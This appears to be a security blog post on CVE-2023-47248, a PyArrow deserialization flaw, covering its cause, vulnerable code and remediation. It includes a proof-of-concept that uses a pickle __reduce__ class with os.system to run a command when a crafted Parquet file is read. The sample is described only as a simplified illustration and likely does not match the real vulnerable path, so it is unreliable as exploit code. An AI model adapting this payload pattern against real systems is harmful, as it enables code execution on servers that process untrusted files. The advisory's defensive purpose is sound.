In November 2023, a major security vulnerability was disclosed for PyArrow, identified as CVE-2023-47248. This flaw lurks in the way PyArrow handles deserializing data, specifically for Arrow IPC, Feather, and Parquet files. In simple terms, if your Python application loads these formats from untrusted sources (such as files uploaded by users), an attacker could run arbitrary code on your system. This is about as bad as it gets: attackers could take over servers, steal data, or run any software they want.

In this post, we'll break down what the vulnerability is, what impact it has, how it can be exploited, and, crucially, how to protect yourself. We'll also provide practical code snippets and pointers to the official references.

What Is PyArrow and Why Does This Matter?

PyArrow is a popular Python library that lets you read and write Apache Arrow, Parquet, and Feather files. These formats are common across data science, analytics, and machine learning pipelines. Many frameworks—like Pandas, Dask, and even some Spark setups—use PyArrow under the hood.

The problem: If your application loads Arrow IPC, Feather, or Parquet files from user uploads or public locations, a poisoned file can trigger remote code execution (RCE).

Cause of CVE-2023-47248: Deserialization of Untrusted Data

The core issue is unsafe deserialization.

When reading Arrow IPC, Feather, or Parquet files, affected PyArrow versions would reconstruct Python objects directly from data embedded in the file. A malicious file could contain crafted input that reaches Python's pickle module (or a similarly unsafe deserialization path), allowing the attacker to execute arbitrary Python code.

> This only affects PyArrow. Other Apache Arrow implementations are not vulnerable.

Official PyArrow security advisory:

- GHSA-x6mp-9h99-jz6g
- PyPI PyArrow Hotfix

How Can This Be Exploited? An Example

Let’s say you’re running a Flask web app where users can upload files, and you load them using PyArrow or via Pandas (e.g., pandas.read_parquet). Here’s a simplified vulnerable code sample:

import pyarrow.parquet as pq

def handle_uploaded_file(filepath):
    # VULNERABLE: Don't load files from untrusted sources like this!
    table = pq.read_table(filepath)
    # Further processing...

An attacker could upload a “parquet” file with an embedded payload. When pq.read_table(filepath) is called, their code runs—possibly creating a reverse shell, stealing credentials, etc.

The same applies even if you load the file through pandas:

import pandas as pd

def upload(file):
    # VULNERABLE if underlying pyarrow is affected
    df = pd.read_parquet(file)

Please use this code for education only!

Suppose an attacker generates a malicious Parquet file that, when deserialized, runs arbitrary Python code:

import pandas as pd
import pickle
import pyarrow as pa
import pyarrow.parquet as pq

class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ('touch /tmp/owned_by_pyarrow',))  # Example: create a marker file

# Craft a DataFrame with a malicious object column
df = pd.DataFrame({'payload': [Exploit()]})

# Save as Parquet
table = pa.Table.from_pandas(df)
pq.write_table(table, 'badfile.parquet')

# When read by a vulnerable system, arbitrary code executes:
pd.read_parquet('badfile.parquet')  # This will create /tmp/owned_by_pyarrow

Note: The snippet above is a simplified illustration of the attack pattern. PyArrow 14.0.1 and later address the issue, but with versions 0.14.0 through 14.0.0, reading a file can become a remote code execution vector if its origin is not trusted!

You are vulnerable if both of the following are true:

- Your app uses PyArrow 0.14.0 up to but not including 14.0.1.
- It reads Arrow IPC, Feather, or Parquet data from locations that could be controlled by an attacker (e.g., file uploads, internet downloads, unvetted third-party sources).

You are not affected if either of the following is true:

- Your PyArrow is version 14.0.1 or above.
- You have applied the hotfix package.

The PyArrow team quickly patched this in version 14.0.1. Upgrade as follows:

pip install --upgrade pyarrow
# or for conda users
conda update pyarrow

Check your installed version:

import pyarrow
print(pyarrow.__version__)
# Must be 14.0.1 or later
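To automate that check, for example at application startup, the comparison against the affected range (0.14.0 through 14.0.0) can be sketched as below. The names `parse_version` and `is_affected` are hypothetical helpers introduced here, not part of PyArrow, and the parser is deliberately simplified: it reads only the leading numeric components, so a pre-release build of 14.0.1 would be treated as fixed.

```python
import re

# Affected range for CVE-2023-47248: 0.14.0 <= version < 14.0.1
FIRST_AFFECTED = (0, 14, 0)
FIRST_FIXED = (14, 0, 1)


def parse_version(version: str) -> tuple:
    """Return (major, minor, patch) from the start of a version string.

    A missing patch component is read as 0; suffixes such as '.dev0'
    or 'rc1' are ignored (a simplification).
    """
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) if part else 0 for part in match.groups())


def is_affected(version: str) -> bool:
    """True if the given PyArrow version falls inside the affected range."""
    return FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED


# Typical use (assumes pyarrow is installed):
#   import pyarrow
#   if is_affected(pyarrow.__version__):
#       raise RuntimeError("PyArrow is vulnerable to CVE-2023-47248; upgrade first")
```

Failing fast like this is one possible design choice; an application could equally log a warning or refuse only the code paths that read untrusted files.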

If you cannot upgrade, install the hotfix package (works for most old versions):

pip install pyarrow-hotfix

The hotfix disables the vulnerable feature by monkey-patching the affected code paths. See the pyarrow-hotfix page on PyPI for full details.
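Installing the package is not enough on its own: as the project's documentation describes it, the patch takes effect when the `pyarrow_hotfix` module is imported, so that import should run before any code that reads untrusted files. A minimal sketch follows; `HOTFIX_ACTIVE` and `hotfix_status` are hypothetical names introduced here for illustration.

```python
# Import the hotfix as early as possible, before any pyarrow-based reads.
try:
    import pyarrow_hotfix  # noqa: F401  (imported only for its side effect)
    HOTFIX_ACTIVE = True
except ImportError:
    # Package not installed: the application is unprotected unless
    # pyarrow itself is 14.0.1 or later.
    HOTFIX_ACTIVE = False


def hotfix_status() -> str:
    """Human-readable summary suitable for a startup log line."""
    if HOTFIX_ACTIVE:
        return "pyarrow-hotfix loaded"
    return "pyarrow-hotfix NOT loaded"


print(hotfix_status())
```

Recording the result in a flag lets the rest of the application decide whether to accept untrusted files at all, rather than silently continuing without protection.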

Downstream Dependencies

If you develop libraries or applications that depend on PyArrow, declare a dependency requiring at least 14.0.1 in your requirements.txt or pyproject.toml:

pyarrow >= 14.0.1

Key References and Further Reading

- Apache Arrow Security Advisory
- PyPI pyarrow-hotfix package
- Arrow 14.0.1 Release Notes
- CVE-2023-47248 on MITRE

Takeaways

- CVE-2023-47248 is a critical remote code execution bug in PyArrow’s deserialization; real-world exploits are simple if you process untrusted files.
- Upgrade immediately to PyArrow 14.0.1 or later, or apply the hotfix if you cannot upgrade.
- Never deserialize files from untrusted sources without input validation and sandboxing, even with patched dependencies.

The world of data science and analytics moves fast. But as this PyArrow case shows, don’t forget to lock your (virtual) doors.

Timeline

Published on: 11/09/2023 09:15:08 UTC
Last modified on: 11/29/2023 03:15:42 UTC